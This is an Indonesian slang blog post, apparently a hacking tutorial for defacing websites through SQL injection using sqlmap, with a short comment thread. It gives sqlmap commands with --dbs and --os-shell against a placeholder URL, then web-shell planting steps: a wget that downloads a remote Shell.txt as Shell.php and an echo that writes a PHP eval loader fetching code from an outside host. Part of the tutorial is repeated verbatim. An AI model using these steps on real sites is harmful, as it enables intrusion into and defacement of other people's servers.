eh wasapp gaes balik lagi ma gw admin wibu, ganteng di sini h3h3h3h , kali ini gw mau kasih tutor deface ya karna ra deface ra uwu:3 , PoC : SQL-I INTO OUT FILE WITH SQLMAP , sebenernya ada yang cara manual tapi lagi maled w, poc ini ga jauh beda sama sqli biasa buat yang belom bisa sqli liat tutor berikut Touch me onii-chan
Bahan buat nghek :
- tools sqlmap
- site vuln
- ganteng h3h3h3h3
Cara install sqlmap :3
- pkg install git && pkg install python2
- git clone https://github.com/sqlmapproject/sqlmap
Oke langsung gad ke tutor nya ..
Pertama open tools sqlmap nya :
Cd sqlmap
Jika sudah jalankan tools sqlmal nya dengan cara
Python2 sqlmap -u localhost:8080/bapakkau.php?id=69 --dbs
screenshotnya onichann :
Bahan buat nghek :
- tools sqlmap
- site vuln
- ganteng h3h3h3h3
Cara install sqlmap :3
- pkg install git && pkg install python2
- git clone https://github.com/sqlmapproject/sqlmap
Oke langsung gad ke tutor nya ..
Pertama open tools sqlmap nya :
Cd sqlmap
Jika sudah jalankan tools sqlmal nya dengan cara
Python2 sqlmap -u localhost:8080/bapakkau.php?id=69 --dbs
screenshotnya onichann :
*sorry buriq lurd xixixi
Oke jika sudah dapat db nya tinggal gad muehehe dengan cara :
Python2 sqlmap.py - u localhost:8080/bapakkau.php?id=69 --os-shell
*sorry buriq lurd xixixix
Nah nanti ada pilihan dari tools nya lu pilih aja sendiri , w mld soalnya xixixi .
Kalo udah berhasil gitu tampilan nya onii-chan:(
Sekarang tinggal lo panggil shell pake command remote code execution( rce rce tai anjing 😃 )
cara manggil nya seperti ini oniichan:3
- wget linkshell.com/Shell.txt -O Shell.php
- echo '<?php eval("?>".file_get_contents("linkshell.com/Shell.txt"));?>' > shell.php
Ya sekian dari gw h3h3h3h3 , kurang lebih nya mon maap . Stay strong ailopyu all😃❤
Absolutely fake
BalasHapusDah lah males
Hapussadasd
BalasHapus